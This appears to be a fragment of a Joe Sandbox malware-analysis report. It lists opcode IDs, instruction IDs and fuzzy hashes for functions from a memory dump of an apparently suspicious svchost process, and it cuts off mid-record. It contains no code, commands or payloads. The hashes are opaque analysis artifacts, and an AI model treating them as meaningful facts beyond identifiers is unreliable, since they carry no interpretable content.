                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 327193bb9ca5a2c51a16373351229c2c113fa28fbeeef7db2aa33024c12ea8dc
                                                                                                                                                                              • Instruction ID: 9a87d0f609a832b2ae5cd98fba360862a033945861223407b77c4eeb7556061e
                                                                                                                                                                              • Opcode Fuzzy Hash: 327193bb9ca5a2c51a16373351229c2c113fa28fbeeef7db2aa33024c12ea8dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4301C479707644ABE716E2A9D844F6BA6DCEF81354F0D08B5F9018B650DA14DC00C2A1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a72b47d3998f7e941f31f8921d0938ad3151e831cbff68dfa1b438d763309184
                                                                                                                                                                              • Instruction ID: b570994b4f920243b8fb89a718e143d1790989fec61e2c8c1696c61a94ecbcb9
                                                                                                                                                                              • Opcode Fuzzy Hash: a72b47d3998f7e941f31f8921d0938ad3151e831cbff68dfa1b438d763309184
                                                                                                                                                                              • Instruction Fuzzy Hash: 90019676B05740ABD711EB699C85FAFBAE8EFC4614F040429FA05D7141EB70FD018661
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8513b4dce1bcbe8a4cc1def8689e9ea4f26167a91ec86bf9632b423709dd9159
                                                                                                                                                                              • Instruction ID: 18a63578a889a82a844d5f43d41e627923e40c1790a3dc047c55ec5b95ee301b
                                                                                                                                                                              • Opcode Fuzzy Hash: 8513b4dce1bcbe8a4cc1def8689e9ea4f26167a91ec86bf9632b423709dd9159
                                                                                                                                                                              • Instruction Fuzzy Hash: 06119E7A242644AFDB25CF5AD940B57B7ACEB8A764F044519F8148F290C770E840CF60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b3bf421d074507cf9511b8dcb165749659c686bb75508b3753a0257ca469c3c4
                                                                                                                                                                              • Instruction ID: 4c6963ea487f32e4fc0dc7592ae91bae2a5a905bb2430ede6d3250c3bf633835
                                                                                                                                                                              • Opcode Fuzzy Hash: b3bf421d074507cf9511b8dcb165749659c686bb75508b3753a0257ca469c3c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 2311E576A02719ABCB21EF59DDC0B9EF7F8EF88750F540054E901BB204D731AD118BA0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8f8f267bd81b3de51e51e2062f69f0ea37f98b89023ac7ea5254f4fc09f28d53
                                                                                                                                                                              • Instruction ID: c912309a79348d86f20792e0448e3e26ecc79f485c3b1197893618fe1c0c1a79
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8f267bd81b3de51e51e2062f69f0ea37f98b89023ac7ea5254f4fc09f28d53
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C11A071602724AFD722CF65C841FAB7BE8EB48704F05882AE985DB211D775EC00CBA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f0addcad51a69f1884fbb1a5f4da41b40fdb549a59381883abfb3dce620ab3ec
                                                                                                                                                                              • Instruction ID: 295742da840a4124a40254fea44af7c5b164ff71ecf4b05aef60be65b89df883
                                                                                                                                                                              • Opcode Fuzzy Hash: f0addcad51a69f1884fbb1a5f4da41b40fdb549a59381883abfb3dce620ab3ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 0311A075A02748DBD720DF69D844FAEB7E8AB84600F1804B6E901AB241DA79D901C754
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                              • Instruction ID: 269c5360e7eda744d08ef10a03fb4680e34899533ba9a405b2e8530ea1d7c6b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                              • Instruction Fuzzy Hash: E701CC76642204AFD721DB55EC00BDBBBF9EF85B50F198434E9059B260E775DD40CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                              • Instruction ID: 83c9e1b44a5e2a9ff21707f763256f1aa39ef255c0daf061f27118f63004e66c
                                                                                                                                                                              • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 9301F57A241649BFD711EF16CC80FA6F77DFF84790B044929F10046560C731ACA0CBA8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                              • Instruction ID: 054db0248a208655784d26a7241a94736b84c7cc223e1c5b669ca10d6e02b8dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 1401C4716067219BCB60CF199840A6ABFE9EB45770705896EF8958B680DF31D424CB60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: daa9f8a4488dacec37688c6f526859780ee182c4e5544f80d5e3e8474e8385b3
                                                                                                                                                                              • Instruction ID: 410da1cf778332dc86dbe17bf8b21e91a51ed2f8390aac0fb043ab3ac86aa37e
                                                                                                                                                                              • Opcode Fuzzy Hash: daa9f8a4488dacec37688c6f526859780ee182c4e5544f80d5e3e8474e8385b3
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B11707494231CABEB65EB64CC41FE9B3B8EF44710F5445D4A314AA0E0DB709E91CF88
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 89fac5f0b3270e624c9c0dc1a682ee08d46e4eaceb21f063352057488b4e08c6
                                                                                                                                                                              • Instruction ID: 45deb94216d6d8f67523de8d44374bc94e3389a49a23443de88adbcd48869866
                                                                                                                                                                              • Opcode Fuzzy Hash: 89fac5f0b3270e624c9c0dc1a682ee08d46e4eaceb21f063352057488b4e08c6
                                                                                                                                                                              • Instruction Fuzzy Hash: AD117C36642740EFCB15EF58D980F56B7B8FF88B44F140465E9059B6A1C235ED01CB90
Memory Dump Source
• Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4b1e789291b12b82fbafba879db65993b763902e0f07ef603af6eeee48ad1610
                                                                                                                                                                              • Instruction ID: 041f2825793e1aa4683c553ac37f225c6da5d5a229b965708c1b4d453b82bd52
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b1e789291b12b82fbafba879db65993b763902e0f07ef603af6eeee48ad1610
                                                                                                                                                                              • Instruction Fuzzy Hash: C311297790111DABCB15DB95CC84EEFBBBCEF48254F044166E906E7210EA35EA54CBE0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                              • Instruction ID: efd3fde560122d74e0a51f5df4dc0d2653bd1547caaaba6a24843c0f995c00be
                                                                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 640128362022118BDF50EA69D880BD6B7AEBFC5700F1949E5ED418F246DA71C881C790
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                              • Instruction ID: d18bf6aae7df46ebd52950cb0e86ea7a633a50379ed424e849cf9b3caa8e944a
                                                                                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                              • Instruction Fuzzy Hash: 14014C361027459FEB32E766D840FABB7EDFFC4650F08491AE9868B580DE70E501CB50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b76cbf18cc43292c11e9fed5587ea0c1831859a84dff278772e3ffe37aae49af
                                                                                                                                                                              • Instruction ID: 313667678cca31e702403cf3c913a6aa8291c300415be95752419fd09d03ab56
                                                                                                                                                                              • Opcode Fuzzy Hash: b76cbf18cc43292c11e9fed5587ea0c1831859a84dff278772e3ffe37aae49af
                                                                                                                                                                              • Instruction Fuzzy Hash: 8A116D75A0224CEBDB05EFA8D850EAE7BB9FB84340F004499E9019B290D635EE11CB94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                              • Instruction ID: beb056fd8133c3710044a84ee9479965b54abd8f40c4ad2fa0eea2249f72f1a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                              • Instruction Fuzzy Hash: 55118B72902B219FD721DF15C880F62BBE8BF80762F19886CE4894A5A5C374E890CB14
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                              • Instruction ID: 5a614c932e2a5ba6d15a5e13a817fac9177fec7e32cab21dc4bfffc5e4eddeb0
                                                                                                                                                                              • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                              • Instruction Fuzzy Hash: D101F93A702205A7CB1ADB9BCC04F9FBBAC9FC4681B150469BE05DF520EA30ED01CB60
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                              • Instruction ID: 4278b125deebb14b14473b7d9268517a1ef2ca016efe14c29ba76e0d15362cb6
                                                                                                                                                                              • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                              • Instruction Fuzzy Hash: 450147BAB036059BD710DA54E800FA9B3E9EFD8720F148155FE128F284CB74DA00C780
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 549a734c7aca339a026f4081d4679a061ad7c8079113ae7c34a8ef9970fd533a
                                                                                                                                                                              • Instruction ID: afb371eb0c483e684b0f88dca3d4ff50428a683ee1becaaf0a8176b489b36383
                                                                                                                                                                              • Opcode Fuzzy Hash: 549a734c7aca339a026f4081d4679a061ad7c8079113ae7c34a8ef9970fd533a
                                                                                                                                                                              • Instruction Fuzzy Hash: E901AC39702614DBC71CEB65DC10AEEBBF9EF84510F198029D901AB640EE70DD05C7A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                              • Instruction ID: 6d5e3b6d65873a0889f05e848c35bdd7f581137b2a07bb5637e70c09f8125d5b
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                              • Instruction Fuzzy Hash: BF015AB22026809FD322E71DC948F7AB7ECEB85750F0D04B1E955CB691D768DD80C625
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7f65fed2f06e1a63e60f82972e098ba952d3b76e4e562d3ba0f114ba083771ef
                                                                                                                                                                              • Instruction ID: cce3d9ca05a610e52f8196f7565e8fa3fea90423496ef77c3d6bd6c6fc65d466
                                                                                                                                                                              • Opcode Fuzzy Hash: 7f65fed2f06e1a63e60f82972e098ba952d3b76e4e562d3ba0f114ba083771ef
                                                                                                                                                                              • Instruction Fuzzy Hash: 82018F75A11358EFDB14EFA9D815FAFBBB8EF84700F044066B500EB280D6B4DA00C7A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                                              • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                                                                              • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                                                                              • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 3f0a07a01ed6f2d7d99bf6e1d84ac48da0e4b69f9ef7478c789d606e0e5f5c41
                                                                                                                                                                              • Instruction ID: bef3b80f99b5745d20919d0a6311916528ae987fc7e86f188dff497a8fcc793c
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0a07a01ed6f2d7d99bf6e1d84ac48da0e4b69f9ef7478c789d606e0e5f5c41
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A116D78D10249EBCB04DFA9D440ADEB7B4EF18304F14809AA814EB380D774DA02CBA5
Memory Dump Source
• Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              • Instruction ID: a6341fcffd916a589a82075829e1d3ab5a58711b5c8b228f5057f2aa74090240
                                                                                                                                                                              • Opcode Fuzzy Hash: 3980b5c9bd7f5ea0dac0c3fce4e2e332af85e5cd3c5196c59d29ca91d3260367
                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF02B712063645FF350D65DDC02B6636D9DBC1651F298066EB098F2C0EAB5DC018394
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                                                                              • Instruction ID: bdc0c085d894e4de6cd8d349b1d432cb67bc62d3f9c9c8f0350121f124ed0b42
                                                                                                                                                                              • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF04FBA940304BFE711EBA4CD41FDA77FCEB44710F100566AA26DA1D0EAB0AA44CB94
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                              • Instruction ID: d40c4dbb6c2f65014946735eb2fdf96e0288a635e3d26035281a78ca9f1d457a
                                                                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                              • Instruction Fuzzy Hash: EFF05435743B1247D7B5EA6F9850B6FE2D59FC0950B49052C9455DBA40DF70D8018794
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0e3ff0c63bda8ed1a1212ffb4d86cd5dafc584107f2ffda99cb2c8bb7b8136cc
                                                                                                                                                                              • Instruction ID: e6a838d9a1bf72f0bd787e50e33c07b57496000ecd1cd2efc69eba3c31245e8a
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e3ff0c63bda8ed1a1212ffb4d86cd5dafc584107f2ffda99cb2c8bb7b8136cc
                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF0A9B5E02308EFCB04EFA9D505A9EB7F4EF48300F4080A9B945EB381E674EA00CB54
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 047bccebddf8e2629fda389614bc16f36046766dca3a06c01e05deff0b429347
                                                                                                                                                                              • Instruction ID: e36dbbadf5050acc0c97133b4cab1a7d2c92c134a9d33d1f6ff25d08443cd6f5
                                                                                                                                                                              • Opcode Fuzzy Hash: 047bccebddf8e2629fda389614bc16f36046766dca3a06c01e05deff0b429347
                                                                                                                                                                              • Instruction Fuzzy Hash: 67F0FA32200344ABC731EB09CC04F9ABBEDEFC8B10F080169A94283090C7A0A918C764
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bc4bd3ca4ebd8fcdff5c669ed6bea37f5ce7191f8d80dc32ab14c5c1981b38d8
                                                                                                                                                                              • Instruction ID: c57488a96275124413a0a01d2fbbaa4c2c3128f3e17665867c1262536d1d1084
                                                                                                                                                                              • Opcode Fuzzy Hash: bc4bd3ca4ebd8fcdff5c669ed6bea37f5ce7191f8d80dc32ab14c5c1981b38d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 82F0673D9176E49FD7A2CB6AC444B69B7DCDB02A60F0C89AAD4898F541C764D881CA50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 391242586c38ac10aa1ab21e0258e3058191c0eb14dd967852af7c0bbfff2f6f
                                                                                                                                                                              • Instruction ID: 68b615f0b4b18feb4d0d771abe5f449ff7ff5a3573a8c57824ce2d0689c4b182
                                                                                                                                                                              • Opcode Fuzzy Hash: 391242586c38ac10aa1ab21e0258e3058191c0eb14dd967852af7c0bbfff2f6f
                                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0273A51B7C45ECF75FB2C75502D1AF98A79A110F1D1485C5A16B646C9B488D3C630
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8fc840cfc63b48f092a2d21bd3748913178db7f6e959b5b83ab29ec2ee15c626
